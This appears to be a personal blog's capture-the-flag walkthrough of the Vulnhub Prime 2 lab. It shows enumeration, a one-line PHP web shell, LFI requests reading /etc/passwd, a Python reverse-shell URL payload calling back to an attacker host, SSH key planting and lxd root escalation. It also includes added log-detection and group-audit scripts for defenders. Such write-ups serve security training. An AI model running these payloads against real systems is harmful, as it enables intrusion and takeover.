Windy's little blog

All the odds and ends of life, and I like CTF.

Vulnhub Prime (2021): 2 Walkthrough

https://www.vulnhub.com/entry/prime-2021-2,696/

Scan ports.

 # Nmap 7.91 scan initiated Wed May 12 17:59:43 2021 as: nmap -sV -sC -p- -oN ports.log 192.168.33.139
 Nmap scan report for 192.168.33.139 (192.168.33.139)
 Host is up (0.0041s latency).
 Not shown: 65530 closed ports
 PORT      STATE SERVICE     VERSION
 22/tcp    open  ssh         OpenSSH 8.4p1 Ubuntu 5ubuntu1 (Ubuntu Linux; protocol 2.0)
 | ssh-hostkey:
 |   3072 0a:16:3f:c8:1a:7d:ff:f5:7a:66:05:63:76:7c:5a:95 (RSA)
 |   256 7f:47:44:cc:d1:c4:b7:54:de:4f:27:f2:39:38:ff:6e (ECDSA)
 |_  256 f5:d3:36:44:43:40:3d:11:9b:d1:a6:24:9f:99:93:f7 (ED25519)
 80/tcp    open  http        Apache httpd 2.4.46 ((Ubuntu))
 |_http-server-header: Apache/2.4.46 (Ubuntu)
 |_http-title: HackerCTF
 139/tcp   open  netbios-ssn Samba smbd 4.6.2
 445/tcp   open  netbios-ssn Samba smbd 4.6.2
 10123/tcp open  http        SimpleHTTPServer 0.6 (Python 3.9.4)
 |_http-server-header: SimpleHTTP/0.6 Python/3.9.4
 |_http-title: Directory listing for /
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
 
 Host script results:
 |_clock-skew: 7h59m59s
 |_nbstat: NetBIOS name: HACKERCTFLAB, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
 | smb2-security-mode:
 |   2.02:
 |_    Message signing enabled but not required
 | smb2-time:
 |   date: 2021-05-12T18:00:05
 |_  start_date: N/A


List the SMB shares.

 smbclient -L 192.168.33.139
 Enter WORKGROUP\kali's password:
 
         Sharename       Type      Comment
         ---------       ----      -------
         print$          Disk      Printer Drivers
         welcome         Disk      Welcome to Hackerctf LAB
         IPC$            IPC       IPC Service (hackerctflab server (Samba, Ubuntu))
 SMB1 disabled -- no workgroup available


Found shell.php in /upload.

 smbclient '\\\\192.168.33.139\\welcome'
 Enter WORKGROUP\kali's password:
 Try "help" to get a list of possible commands.
 smb: \> dir
   .                                   D        0  Thu May 13 04:27:52 2021
   ..                                  D        0  Sat May  8 02:38:58 2021
   .mysql_history                      H       18  Sat May  8 15:05:03 2021
   .ssh                               DH        0  Thu May 13 04:29:18 2021
   .profile                            H      807  Sat Mar 20 00:02:58 2021
   upload                              D        0  Sun May  9 19:19:02 2021
   .sudo_as_admin_successful           H        0  Sat May  8 13:34:48 2021
   .bash_logout                        H      220  Sat Mar 20 00:02:58 2021
   .cache                             DH        0  Sat May  8 02:39:15 2021
   something                           N       82  Sat May  8 00:18:09 2021
   secrets                             N        0  Sat May  8 00:15:17 2021
   .bash_history                       H       72  Sun May  9 19:23:26 2021
   .bashrc                             H     3771  Sat Mar 20 00:02:58 2021
 
                 19475088 blocks of size 1024. 9885876 blocks available
 smb: \> cd upload
 smb: \upload\> dir
   .                                   D        0  Sun May  9 19:19:02 2021
   ..                                  D        0  Thu May 13 04:27:52 2021
   shell.php                           A       35  Sun May  9 19:19:02 2021
 
                 19475088 blocks of size 1024. 9885872 blocks available
 smb: \upload\> get shell.php
 getting file \upload\shell.php of size 35 as shell.php (6.8 KiloBytes/sec) (average 6.8 KiloBytes/sec)
 smb: \upload\>


Check shell.php.

 cat shell.php
 <?php echo system($_GET['cmd']);?>


Found the username jarves in the file something.

 cat something
 I wanted to make it my home directory. But idea must be changed.
 
 
 Thanks,
 jarves


Directory scan of the web server on port 80 (output saved in 80.log).

 cat 80.log
 /css                  (Status: 301) [Size: 314] [--> http://192.168.33.139/css/]
 /server               (Status: 301) [Size: 317] [--> http://192.168.33.139/server/]
 /wp                   (Status: 301) [Size: 313] [--> http://192.168.33.139/wp/]
 /index.html           (Status: 200) [Size: 5761]
 /images               (Status: 301) [Size: 317] [--> http://192.168.33.139/images/]
 /javascript           (Status: 301) [Size: 321] [--> http://192.168.33.139/javascript/]


Scan the WordPress install with wpscan: one user and one vulnerable plugin found.

 wpscan --url http://192.168.33.139/wp/ -e u,ap --no-banner --api-token yourtoken --force --plugins-detection aggressive
 ...
 [+] gracemedia-media-player
  | Location: http://192.168.33.139/wp/wp-content/plugins/gracemedia-media-player/
  | Latest Version: 1.0 (up to date)
  | Last Updated: 2013-07-21T15:09:00.000Z
  | Readme: http://192.168.33.139/wp/wp-content/plugins/gracemedia-media-player/readme.txt
  | [!] Directory listing is enabled
  |
  | Found By: Known Locations (Aggressive Detection)
  |  - http://192.168.33.139/wp/wp-content/plugins/gracemedia-media-player/, status: 200
  |
  | [!] 1 vulnerability identified:
  |
  | [!] Title: GraceMedia Media Player 1.0 - Local File Inclusion (LFI)
  |     References:
  |      - https://wpscan.com/vulnerability/a4f5b10f-3386-45cc-9548-dd7bbea199d6
  |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9618
  |      - https://www.exploit-db.com/exploits/46537/
  |      - https://seclists.org/fulldisclosure/2019/Mar/26
 ...
 [i] User(s) Identified:
 
 [+] admin
  | Found By: Author Posts - Author Pattern (Passive Detection)
  | Confirmed By:
  |  Rss Generator (Passive Detection)
  |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
  |  Login Error Messages (Aggressive Detection)
 


The plugin has a known LFI vulnerability.

 searchsploit gracemedia
 ------------------------------------------------------------------------------------- ---------------------------------
  Exploit Title                                                                       |  Path
 ------------------------------------------------------------------------------------- ---------------------------------
 WordPress Plugin GraceMedia Media Player 1.0 - Local File Inclusion                  | php/webapps/46537.txt
 ------------------------------------------------------------------------------------- ---------------------------------


Check if LFI works.

 curl '192.168.33.139/wp/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd'
 root:x:0:0:root:/root:/bin/bash
 ...
 jarves:x:1000:1000:jarves:/home/jarves:/bin/bash
 lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
 ...


Use the LFI to include shell.php from the SMB share and run a command through it.

 curl '192.168.33.139/wp/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../home/jarves/upload/shell.php&cmd=id'
 uid=33(www-data) gid=33(www-data) groups=33(www-data)
 uid=33(www-data) gid=33(www-data) groups=33(www-data)
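From the defender's side, the two requests above leave a clear trace in the Apache access log. The following detection script is an added example (not from the original post): it parses constructed combined-format log lines and flags any call to the plugin's ajax_controller.php whose cfg parameter contains a path traversal, noting when a cmd parameter is also passed to the included file.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed Apache access-log lines (not from the original post): a page view,
# the two LFI requests from the walkthrough, and a benign plugin call.
SAMPLE_LOG = """\
192.168.33.128 - - [12/May/2021:18:05:01 +0000] "GET /wp/ HTTP/1.1" 200 5761 "-" "Mozilla/5.0"
192.168.33.128 - - [12/May/2021:18:05:09 +0000] "GET /wp/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd HTTP/1.1" 200 2312 "-" "curl/7.74.0"
192.168.33.128 - - [12/May/2021:18:06:40 +0000] "GET /wp/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=..%2F..%2F..%2F..%2Fhome%2Fjarves%2Fupload%2Fshell.php&cmd=id HTTP/1.1" 200 112 "-" "curl/7.74.0"
192.168.33.128 - - [12/May/2021:18:07:02 +0000] "GET /wp/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=config.php HTTP/1.1" 200 55 "-" "Mozilla/5.0"
"""

# Combined log format: client, identd, user, [timestamp], "METHOD target PROTO", status
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) ')
TRAVERSAL_RE = re.compile(r'(^|/)\.\.(/|$)')  # a ".." path component anywhere in the value
VULN_PATH = "/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php"


def fully_decode(value, rounds=3):
    """Undo repeated percent-encoding so ..%252F style evasions still match."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def analyse_request(target):
    """Return finding strings for one request target; [] means nothing suspicious."""
    parts = urlsplit(target)
    if not parts.path.endswith(VULN_PATH):
        return []
    findings = []
    params = parse_qs(parts.query, keep_blank_values=True)
    for cfg in params.get("cfg", []):
        cfg = fully_decode(cfg)
        if TRAVERSAL_RE.search(cfg) or cfg.startswith("/"):
            findings.append(f"cfg traversal: {cfg}")
            # an extra cmd parameter means the included file is being driven as a web shell
            if "cmd" in params:
                findings.append(f"cmd passed to included file: {params['cmd'][0]}")
    return findings


def scan_log(text):
    """Return (client_ip, timestamp, findings) for every suspicious request in text."""
    alerts = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m and (findings := analyse_request(m.group("target"))):
            alerts.append((m.group("ip"), m.group("ts"), findings))
    return alerts
```

Running scan_log over SAMPLE_LOG returns two alerts: the /etc/passwd read and the shell.php inclusion with its cmd value.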


Visit the following address to make shell.php spawn a Python reverse shell back to 192.168.33.128:1234.

Visit http://192.168.33.139/wp/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../home/jarves/upload/shell.php&cmd=python3%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.33.128%22,1234));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/bash%22,%22-i%22]);%27


Catch the reverse shell with nc.

 nc -nlvp 1234
 Ncat: Version 7.91 ( https://nmap.org/ncat )
 Ncat: Listening on :::1234
 Ncat: Listening on 0.0.0.0:1234
 Ncat: Connection from 192.168.33.139.
 Ncat: Connection from 192.168.33.139:49084.
 bash: cannot set terminal process group (971): Inappropriate ioctl for device
 bash: no job control in this shell
 <t/plugins/gracemedia-media-player/templates/files$
 
 <t/plugins/gracemedia-media-player/templates/files$ id
 id
 uid=33(www-data) gid=33(www-data) groups=33(www-data)


Another way to get an SSH login as jarves directly is to upload an authorized_keys file through the SMB share, since the share is the user's home directory.

 smbclient '\\\\192.168.33.139\\welcome'
 ...
 smb: \> mkdir .ssh
 smb: \> cd .ssh
 smb: \.ssh\> put authorized_keys
 putting file authorized_keys as \.ssh\authorized_keys (183.9 kb/s) (average 183.9 kb/s)
 smb: \.ssh\> chmod 600 authorized_keys
 Server doesn't support UNIX CIFS calls.


Check the groups of jarves.

 jarves@hackerctflab:~$ id
 uid=1000(jarves) gid=1000(jarves) groups=1000(jarves),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lxd)
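Membership in lxd is the root cause of the escalation that follows, and it is easy to audit. The script below is an added defender-side example (not part of the original walkthrough): it parses constructed /etc/passwd and /etc/group fragments modelled on the id output above and reports every non-root account that holds a root-equivalent group, counting both the primary group and supplementary memberships.

```python
# Constructed /etc/passwd and /etc/group fragments (not copied from the box;
# only the group names and the lxd gid 116 follow the id output above).
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
jarves:x:1000:1000:jarves:/home/jarves:/bin/bash
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
"""
SAMPLE_GROUP = """\
root:x:0:
adm:x:4:syslog,jarves
sudo:x:27:jarves
lxd:x:116:jarves
docker:x:999:
jarves:x:1000:
"""
# Membership in any of these is effectively root on a typical Linux host.
ROOT_EQUIVALENT = {"root", "sudo", "wheel", "lxd", "docker", "disk"}


def parse_group(text):
    """Map gid -> group name and group name -> set of supplementary members."""
    gid_to_name, members = {}, {}
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        name, _, gid, member_list = line.split(":")[:4]
        gid_to_name[int(gid)] = name
        members[name] = set(filter(None, member_list.split(",")))
    return gid_to_name, members


def root_equivalent_users(passwd_text, group_text):
    """Return {user: sorted root-equivalent groups} for every non-root account."""
    gid_to_name, members = parse_group(group_text)
    report = {}
    for line in passwd_text.splitlines():
        if not line or line.startswith("#"):
            continue
        user, _, uid, gid = line.split(":")[:4]
        # primary group from passwd plus every group listing the user as a member
        groups = {gid_to_name.get(int(gid), gid)}
        groups |= {g for g, m in members.items() if user in m}
        risky = sorted(groups & ROOT_EQUIVALENT)
        if risky and int(uid) != 0:
            report[user] = risky
    return report
```

On a real host, feed it the contents of /etc/passwd and /etc/group; any user listed under lxd or docker should be treated as root for access-review purposes.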
 


Use the classic lxd privilege escalation (jarves is in the lxd group).

 lxc image import ./alpine-v3.13-x86_64-20210405_2328.tar.gz  --alias myimage
 lxd init alpine:v3.12 mypool
 lxc init myimage ignite -c security.privileged=true
 lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
 lxc start ignite


Now we are root.

 jarves@hackerctflab:~$ lxc exec ignite /bin/sh
 ~ # id
 uid=0(root) gid=0(root)


Upload authorized_keys to /root/.ssh (reachable as /mnt/root/root/.ssh inside the container) and log in as root over SSH directly.

 ssh root@192.168.33.139
 ...
 root@hackerctflab:~# id;hostname
 uid=0(root) gid=0(root) groups=0(root)
 hackerctflab

